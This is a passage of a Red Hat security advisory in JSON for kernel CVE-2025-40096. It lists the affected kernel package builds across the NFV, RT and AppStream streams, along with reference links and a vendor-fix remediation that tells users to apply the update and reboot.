"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-zfcpdump-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.src",
"RT-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.39.1.el10_1.noarch",
"RT-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-doc-0:6.12.0-124.39.1.el10_1.noarch",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-zfcpdump-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.x86_64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-40096"
},
{
"category": "external",
"summary": "RHBZ#2407333",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2407333"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-40096",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40096"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-40096",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-40096"
},
{
"category": "external",
"summary": "https://lore.kernel.org/linux-cve-announce/2025103016-CVE-2025-40096-09cc@gregkh/T",
"url": "https://lore.kernel.org/linux-cve-announce/2025103016-CVE-2025-40096-09cc@gregkh/T"
}
],
"release_date": "2025-10-30T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-02-25T02:10:39+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect.",
"product_ids": [
"AppStream-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.src",
"AppStream-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.39.1.el10_1.noarch",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
